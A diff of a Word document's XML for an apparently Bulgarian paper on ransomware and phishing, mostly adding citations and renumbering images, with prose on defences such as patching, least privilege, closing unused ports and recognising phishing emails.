+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Фил20 \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[5]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="-980772652"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Wha25 \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t xml:space="preserve"> </w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[6]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2680,6 +3161,32 @@
       <w:r>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="2064139832"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION arc \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[4]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2716,7 +3223,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14">
+                    <a:blip r:embed="rId17">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2852,7 +3359,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc223346842"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc223361342"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -2895,15 +3402,7 @@
         <w:t xml:space="preserve">капитал </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">на хакера. Постигат го чрез изграждане на фалшиви истории или сценарии. Често </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>фишинг</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> заплахите са прикачени в имейли, социални мрежи, текстови съобщения или телефонни разговори. </w:t>
+        <w:t xml:space="preserve">на хакера. Постигат го чрез изграждане на фалшиви истории или сценарии. Често фишинг заплахите са прикачени в имейли, социални мрежи, текстови съобщения или телефонни разговори. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2914,6 +3413,38 @@
       <w:r>
         <w:t>атаките е най-ефективната форма на атака, понеже измамата е пригодена да бъде максимално убедителна за конкретно лице.</w:t>
       </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="978656913"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Spe \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t xml:space="preserve"> </w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[7]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2952,6 +3483,67 @@
       <w:r>
         <w:t>, като е изписано съобщението, че системата е пробита и че е прикачен файл с инструкции (фиг. 5 и 6).</w:t>
       </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="-1460947716"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Gpc \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[8]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="-417558124"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Gpc \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t xml:space="preserve"> </w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[8]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3048,6 +3640,35 @@
       <w:r>
         <w:t xml:space="preserve"> може да възстанови част от файловете.</w:t>
       </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="1496001391"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Gpc \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[8]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3076,7 +3697,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15">
+                    <a:blip r:embed="rId18">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3234,7 +3855,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16">
+                    <a:blip r:embed="rId19">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3354,7 +3975,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc223346843"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc223361343"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3440,6 +4061,9 @@
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> на телефона. Единственият начин да си възстанови достъпа е, ако телефона се върне до фабрични настройки. Това означава пълно изтриване на личните данни. Ако реши да плати откупа, пин кодът е неизвестен дори и на хакера, понеже е случайно генерирано число.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3471,7 +4095,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17" cstate="print">
+                    <a:blip r:embed="rId20" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3543,7 +4167,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc223346844"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc223361344"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3585,7 +4209,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18">
+                    <a:blip r:embed="rId21">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3793,8 +4417,13 @@
         </w:rPr>
         <w:t>ransomware-</w:t>
       </w:r>
-      <w:r>
-        <w:t>ът и се изисква откуп в биткойни.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ът</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> и се изисква откуп в биткойни.</w:t>
       </w:r>
       <w:r>
         <w:br w:type="page"/>
@@ -3807,7 +4436,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc223346845"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc223361345"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Стратегии и защита от </w:t>
@@ -3869,7 +4498,7 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc223346846"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc223361346"/>
       <w:r>
         <w:t xml:space="preserve">Подготовка за </w:t>
       </w:r>
@@ -4042,6 +4671,35 @@
       <w:r>
         <w:t xml:space="preserve"> Права се дават само при необходимост.</w:t>
       </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="2024287078"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Sto \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[1]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4054,7 +4712,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc223346847"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc223361347"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Превенция </w:t>
@@ -4147,195 +4805,208 @@
         <w:t xml:space="preserve"> също е от ключово значение</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">. Особено </w:t>
+        <w:t>. Особено сканове за тези устройства, които са свързани към интернета, за да се ограничи атаката.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Чести ъпдейти и пачове на софтуера и операционната система към последните налични версии е също важно. Трябва да се приоритизира ъпдейти на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>OS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> свързани с процесването на интернет данни – уеб </w:t>
+      </w:r>
+      <w:r>
+        <w:t>браузери</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и плъгини. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Малкият и средният бизнес често имат такъв проблем с поддържка на актуализациите, поради липсва на отделен </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">security </w:t>
+      </w:r>
+      <w:r>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> maintain</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> екипи.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Едно решение е да се премине към </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>managed cloud providers</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, за да не се налага поддръжка на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exchange server</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> identity server </w:t>
+      </w:r>
+      <w:r>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mail gateway.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Също има</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cloud providers</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> следи за уязвимости, </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>сканове</w:t>
+        <w:t>пачва</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> за тези устройства, които са свързани към интернета, за да се ограничи атаката.</w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve"> системи и има защити против </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DDOS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> атаки</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Уверете се, че всички </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>on-premise</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, облачни, мобилни и лични</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Чести ъпдейти и пачове на софтуера и операционната система към последните налични версии е също важно. Трябва да се приоритизира ъпдейти на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>OS</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> свързани с </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>процесването</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> на интернет данни – уеб </w:t>
-      </w:r>
-      <w:r>
-        <w:t>браузери</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> и плъгини. </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Малкият и средният бизнес често имат такъв проблем с поддържка на актуализациите, поради липсва на отделен </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">security </w:t>
-      </w:r>
-      <w:r>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> maintain</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> екипи.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Едно решение е да се премине към </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>managed cloud providers</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, за да не се налага поддръжка на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>exchange server</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> identity server </w:t>
-      </w:r>
-      <w:r>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mail gateway.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      <w:r>
+        <w:t>устройства</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> са правилно конфигурирани и функциите за сигурност са активирани.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Допълнително е необходимо да се спрат всички портове и протоколи, които не се предназначени за бизнес употреба</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>фиг. 9)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:t>Също има</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> cloud providers</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> следи за уязвимости, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>пачва</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> системи и има защити против </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>DDOS</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> атаки</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="360"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Уверете се, че всички </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>on-premise</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, облачни, мобилни и лични</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>устройства</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> са правилно конфигурирани и функциите за сигурност са активирани.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Допълнително е необходимо да се спрат всички портове и протоколи, които не се предназначени за бизнес употреба</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:t>фиг. 9)</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="1163192477"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Sto \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[1]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4363,7 +5034,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId22"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4452,6 +5123,7 @@
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -4476,7 +5148,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4535,14 +5207,12 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="6"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-      <w:bookmarkStart w:id="11" w:name="_Toc223346848"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="11" w:name="_Toc223361348"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Компрометирани </w:t>
@@ -4785,10 +5455,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> алгоритми.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Едно такова решение е имплементацията на </w:t>
+        <w:t xml:space="preserve"> алгоритми. Едно такова решение е имплементацията на </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4891,6 +5558,32 @@
       <w:r>
         <w:t xml:space="preserve"> и много други. </w:t>
       </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="-1352567070"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Sto \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[1]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4916,7 +5609,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4953,7 +5646,561 @@
         <w:t>(Фиг. 10 – диаграма защо използването на пароли по подразбиране не е препоръчително)</w:t>
       </w:r>
     </w:p>
-    <w:bookmarkStart w:id="12" w:name="_Toc223346849" w:displacedByCustomXml="next"/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:bookmarkStart w:id="12" w:name="_Toc223361349"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Phishing </w:t>
+      </w:r>
+      <w:r>
+        <w:t>атаки</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="12"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">Потребителят трябва да бъде много внимателен към какви платформи, уеб сайтове, форуми използва своя имейл адрес. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Това е и най-лесният начин да стане обект на фишинг атака. Почти всички фишинг имейла носят чувство на тревожност, карат потребителя незабавно да предприеме някакви действия в противен случай, ще се случи Х събитие. Има няколко основни стъпки, по които може да се разпознае дали даден имейл е фишинг или не:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Чувство на тревожност</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Липсва обръщение към </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">получаващия </w:t>
+      </w:r>
+      <w:r>
+        <w:t>– това не винаги е приложимо, ако потребителят е таргетиран може да припознае и лична информация свързано с него.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>За първи път потребителят получава имейл от даден</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> user – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>задължителна проверка на имейл адреса. Някои имейли имитират тези на големи организации, но има минимална и леко забележима разлика в адреса.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Ако идва към служебен имейл – тогава да се провери дали е </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">internal </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">или </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>external</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
